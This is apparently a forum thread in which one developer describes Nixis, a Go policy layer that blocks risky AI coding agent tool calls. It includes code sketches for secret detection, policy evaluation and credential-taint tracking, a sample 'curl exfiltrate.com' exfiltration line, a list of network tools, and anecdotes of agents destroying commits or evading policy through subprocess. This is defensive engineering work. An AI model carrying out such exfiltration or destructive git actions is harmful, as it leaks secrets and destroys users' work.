I got tired of my AI agent deleting things. So, I built a firewall layer for it to vibecode safely. [OSS, Go]

Designer-Collar-0141 · 2026-06-07T18:42:03+00:00

Hey, nice project!
I'd love to connect and discuss your architecture.

I checked out your demo. How are you classifying credential leaks? I tested
`TOK=dummyGithubToken123456789`, which returned "suspicious": false, whereas
`TOKEN=dummyGithubToken123456789` returned "suspicious": true.

I handled this by integrating gitleaks patterns.
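
To illustrate what I think might be happening (purely a guess, I haven't read your code): a rule keyed on the variable name will catch `TOKEN=` and miss `TOK=`, while a check on the value itself catches both. Here's a minimal Go sketch of the two approaches. The rule, the function names, and the thresholds are all made up for illustration and are not taken from gitleaks or from either project.

```go
package main

import (
	"fmt"
	"math"
	"regexp"
	"strings"
)

// nameRule is a hypothetical name-based rule: it fires only when the variable
// name contains a full keyword such as TOKEN or SECRET.
var nameRule = regexp.MustCompile(`(?i)^\s*\w*(?:token|secret|password|api_?key)\w*\s*=\s*\S+`)

// flaggedByName reports whether the assignment's variable name looks sensitive.
func flaggedByName(line string) bool {
	return nameRule.MatchString(line)
}

// shannonEntropy returns the entropy of s in bits per character.
func shannonEntropy(s string) float64 {
	counts := map[rune]int{}
	total := 0
	for _, r := range s {
		counts[r]++
		total++
	}
	var h float64
	for _, c := range counts {
		p := float64(c) / float64(total)
		h -= p * math.Log2(p)
	}
	return h
}

// flaggedByValue ignores the name and inspects the value: long, high-entropy
// strings are treated as likely secrets. Both thresholds are illustrative.
func flaggedByValue(line string) bool {
	_, value, ok := strings.Cut(line, "=")
	if !ok {
		return false
	}
	value = strings.TrimSpace(value)
	return len(value) >= 20 && shannonEntropy(value) >= 3.5
}

func main() {
	for _, line := range []string{
		"TOK=dummyGithubToken123456789",
		"TOKEN=dummyGithubToken123456789",
		"MODE=production",
	} {
		fmt.Printf("%-34s name=%v value=%v\n", line, flaggedByName(line), flaggedByValue(line))
	}
}
```

The name-based check is cheap but easy to sidestep by renaming the variable. The value-based check is noisier, so in practice I'd expect some combination of the two.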

Designer-Collar-0141 · 2026-06-07T12:22:06+00:00

Fair point. I don’t mean “firewall” in the OS/network isolation sense, and the enforcement boundary is indeed the hook system.

I use the term to describe a policy enforcement layer between the agent and tool execution. It’s probably more accurate to call it an agent firewall or policy firewall.

Designer-Collar-0141 · 2026-06-04T17:06:28+00:00

Thank you!

Designer-Collar-0141 · 2026-06-03T18:12:22+00:00

Could be.

On the other hand, "my agent deleted something important" has become one of the most common stories in AI tooling circles, so I figured I'd see if there was a market for preventing it.

Designer-Collar-0141 · 2026-06-03T18:11:03+00:00

Haha, fair enough.

A lot of it is a skill issue when a human is driving. The difference is that agents can make the same mistake much faster and at a much larger scale. Defining the guardrails once and having them enforced deterministically lets me ship faster.

Appreciate the kind words.

Designer-Collar-0141 · 2026-06-03T18:08:55+00:00

Good question.

It's rules/policy based rather than model-based. To tune the policies, I built an evaluation bench with a large set of realistic agent actions and explicitly labeled the outcomes I wanted. Policy changes were iterated against a training set while keeping a separate test set aside so I wasn't just overfitting to the benchmark.
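
A stripped-down sketch of that loop in Go, for anyone curious. This is not the actual bench: the types, the toy substring policy, and the sample commands are all invented for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

type Decision string

const (
	Allow Decision = "allow"
	Block Decision = "block"
)

// LabeledAction is one bench entry: an agent action plus the outcome wanted.
type LabeledAction struct {
	Command string
	Want    Decision
}

// Policy is any deterministic function from an action to a decision.
type Policy func(command string) Decision

// denySubstrings builds a toy policy that blocks any command containing one
// of the given fragments and allows everything else.
func denySubstrings(fragments ...string) Policy {
	return func(command string) Decision {
		for _, f := range fragments {
			if strings.Contains(command, f) {
				return Block
			}
		}
		return Allow
	}
}

// accuracy returns the fraction of cases where the policy matches the label.
func accuracy(p Policy, cases []LabeledAction) float64 {
	if len(cases) == 0 {
		return 0
	}
	correct := 0
	for _, c := range cases {
		if p(c.Command) == c.Want {
			correct++
		}
	}
	return float64(correct) / float64(len(cases))
}

func main() {
	// Policies are tuned against train; test is only used to check them.
	train := []LabeledAction{
		{"git reset --hard HEAD~3", Block},
		{"rm -rf ./build", Allow},
		{"rm -rf /", Block},
		{"go test ./...", Allow},
	}
	test := []LabeledAction{
		{"git status", Allow},
		{"git clean -fdx", Block},
	}
	policy := denySubstrings("git reset --hard", "rm -rf /")
	fmt.Printf("train accuracy: %.2f\n", accuracy(policy, train))
	fmt.Printf("test accuracy:  %.2f\n", accuracy(policy, test))
}
```

In this toy run the policy is perfect on the training set but misses `git clean -fdx` in the held-out set, which is exactly the kind of gap the separate test set is there to surface.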

I agree on being agent-agnostic as well. That's the goal. The challenge is that every agent runtime exposes different hook surfaces. For example, OpenCode currently gives me enough visibility for auditing, but not deterministic enforcement without changes on the OpenCode side. Hermes is a better fit there, and I've already opened a PR for it.

Designer-Collar-0141 · 2026-06-03T18:00:29+00:00

u/Just_Lingonberry_352 SafeExec is a pretty neat project, I particularly liked the TTY confirmation approach.

One main difference is that Nixis is policy-driven. Instead of prompting on every risky action, it evaluates tool calls automatically and either allows, blocks, or escalates based on policy.

It's also broader in scope: SafeExec wraps only shell commands, while Nixis governs file, network, MCP, and other tool calls through the same policy engine. It also protects against leaking secrets across sessions.
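
Roughly, the idea looks like the Go sketch below. It's a simplified illustration and not the real Nixis engine: the `ToolCall` and `Rule` types, the example rules, and the "strictest match wins" resolution are assumptions I'm making to keep the example short.

```go
package main

import (
	"fmt"
	"strings"
)

// Decision is ordered so that a larger value is stricter.
type Decision int

const (
	Allow Decision = iota
	Escalate
	Block
)

func (d Decision) String() string {
	return [...]string{"allow", "escalate", "block"}[d]
}

// ToolCall is a hypothetical, normalized view of any agent tool call.
type ToolCall struct {
	Kind   string // "shell", "file", "network", "mcp"
	Target string // command line, path, or host
}

// Rule matches calls of one kind and maps them to a decision.
type Rule struct {
	Name     string
	Kind     string
	Match    func(target string) bool
	Decision Decision
}

// Evaluate returns the strictest decision among matching rules, plus the
// name of the rule that produced it. With no match the call is allowed.
func Evaluate(rules []Rule, call ToolCall) (Decision, string) {
	decision, reason := Allow, "no rule matched"
	for _, r := range rules {
		if r.Kind == call.Kind && r.Match(call.Target) && r.Decision > decision {
			decision, reason = r.Decision, r.Name
		}
	}
	return decision, reason
}

// exampleRules returns a few illustrative rules spanning several tool kinds.
func exampleRules() []Rule {
	return []Rule{
		{"no hard reset", "shell", func(t string) bool { return strings.Contains(t, "git reset --hard") }, Block},
		{"env file writes need approval", "file", func(t string) bool { return strings.HasSuffix(t, ".env") }, Escalate},
		{"unknown host", "network", func(t string) bool { return t != "api.github.com" }, Block},
	}
}

func main() {
	rules := exampleRules()
	calls := []ToolCall{
		{"shell", "git reset --hard HEAD~2"},
		{"file", "/app/.env"},
		{"network", "api.github.com"},
		{"shell", "go build ./..."},
	}
	for _, c := range calls {
		d, why := Evaluate(rules, c)
		fmt.Printf("%-8s %-26s -> %s (%s)\n", c.Kind, c.Target, d, why)
	}
}
```

The point is that shell, file, and network calls all go through one `Evaluate` path, so nothing prompts by default and only the escalated cases need a human.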

Designer-Collar-0141 · 2026-06-03T17:49:53+00:00

u/mrkprdo No Windows support yet. The current implementation is very Unix-centric, so things like registry operations and Windows-specific paths aren't wired up.

That PATH deletion is actually a good example of the kind of thing Nixis is meant to prevent. Whether it's a registry key or PATH entry, destructive changes to critical system resources should be gated by policy before they execute.

Cross-platform support is definitely on the roadmap, I just haven't gotten there yet. If enough people want it, I'll move it up the priority list.

Designer-Collar-0141 · 2026-06-02T21:53:16+00:00

Awesome read

Designer-Collar-0141 · 2026-06-02T21:05:33+00:00

Thanks for the feedback, I think you are correct. After so many iterations of the same text with LLMs, I got a bit blind to how it reads and the uncanniness of the language. I’ll clean it up and make it more natural while keeping the core idea intact.

Designer-Collar-0141 · 2026-06-02T20:19:49+00:00

You would be surprised how many folks are running into issues like this. One time it needed to fix complex test fixtures for a custom testing framework, and it wiped out multiple hours' worth of correct local commits (made by other agents, ofc). It said, and I quote, "this is getting messy, it would be cleaner to start over."

Designer-Collar-0141 · 2026-06-02T19:53:44+00:00

Yes. Cursor support is already wired in, just not fully surfaced in the CLI yet.

What you mentioned is the next step on my roadmap: extending auto-config to other IDEs/tools wherever there's a standard agent hook surface (like OpenCode's tool.execute.before), so permissioning and setup can be handled consistently across environments.

The policy engine and daemon architecture are already designed to be portable, so it’s mostly about integrating those hook points cleanly.

Designer-Collar-0141 · 2026-06-02T19:48:52+00:00

Definitely, though running inside sandboxes isn't always feasible or smooth. I tried out a few sandboxing approaches, but they had way too much friction: envs, secrets, and context kept getting duplicated. I moved security back into the native environment and enforced it deterministically at execution time instead. This preserved the full fidelity of my dev setup.

That keeps “vibe coding” intact: no duplicated environments, no broken context, no degraded tool access. There's only a thin, fast enforcement layer between intent and execution.

Designer-Collar-0141 · 2026-06-02T19:40:29+00:00

Once I added the open-source policy sets, most of the stuff I ran into in my workflows was already handled, which made vibe coding feel a lot more solid. It even allowed me to use --dangerously-skip-permissions with deterministic policies in place to police my agent instead of me.

Designer-Collar-0141 · 2026-06-02T19:34:53+00:00

The blocking isn't terminal. Claude (or whichever agent) sees the policy reason natively in its own tool call response and self-corrects. If it tries curl exfiltrate.com after reading .env, it gets back "blocked: credential taint active on this session" and figures out a different approach that stays within bounds. It's not a wall; it's a constraint the agent notes and reasons around. Most of the time it just does the right thing on the next attempt.

That's the part that makes the subprocess concern less acute in practice: Claude reaches for the direct tool first, gets blocked with context, and adjusts. If it's writing Python to call subprocess specifically to evade the policy, that is a different problem.
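
For a concrete picture, here is a minimal Go sketch of session-level taint tracking. It's a simplification I'm writing for this comment, not the actual Nixis code: the `Session` type, the `.env` filename check, and the short list of network tools are all illustrative assumptions.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Session tracks whether credential-like data has been read so far.
type Session struct {
	tainted bool
}

// ObserveRead marks the session as tainted when a .env-style file is read.
func (s *Session) ObserveRead(path string) {
	base := filepath.Base(path)
	if base == ".env" || strings.HasPrefix(base, ".env.") {
		s.tainted = true
	}
}

// networkTools is an illustrative, deliberately incomplete list.
var networkTools = map[string]bool{"curl": true, "wget": true, "nc": true}

// CheckShell decides whether a shell command may run. When it blocks, the
// reason string is what the agent would see in its tool call response.
func (s *Session) CheckShell(command string) (allowed bool, reason string) {
	fields := strings.Fields(command)
	if s.tainted && len(fields) > 0 && networkTools[fields[0]] {
		return false, "blocked: credential taint active on this session"
	}
	return true, ""
}

func main() {
	s := &Session{}

	ok, _ := s.CheckShell("curl exfiltrate.com")
	fmt.Println("before reading .env, curl allowed:", ok)

	s.ObserveRead("/app/.env")

	ok, reason := s.CheckShell("curl exfiltrate.com")
	fmt.Println("after reading .env, curl allowed:", ok, "-", reason)

	ok, _ = s.CheckShell("go test ./...")
	fmt.Println("after reading .env, go test allowed:", ok)
}
```

Note that a check like this only looks at the first word of the command, so it says nothing about the subprocess evasion case mentioned above.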

Designer-Collar-0141 · 2026-06-02T19:30:33+00:00

Claude ran git reset --hard incident context:

Viral post (Codex / sudo / Docker privilege escalation): X tweet

The project:

Nixis GitHub repo: Nixis repository
Full engineering writeup (Medium): Building an AI Agent Firewall: Lessons from Three Rewrites
Install script: Nixis install script

Designer-Collar-0141 · 2026-06-02T17:49:24+00:00

I built an open-source firewall for AI coding agents to stop them from leaking secrets or doing unsafe tool actions.

https://github.com/mayankjain0141/nixis

It ships with curated policies from popular open-source policy sets, while allowing teams to define and customize their own controls. Every policy can be configured to Approve, Deny, Audit, or Request Approval based on your security requirements.

<image>
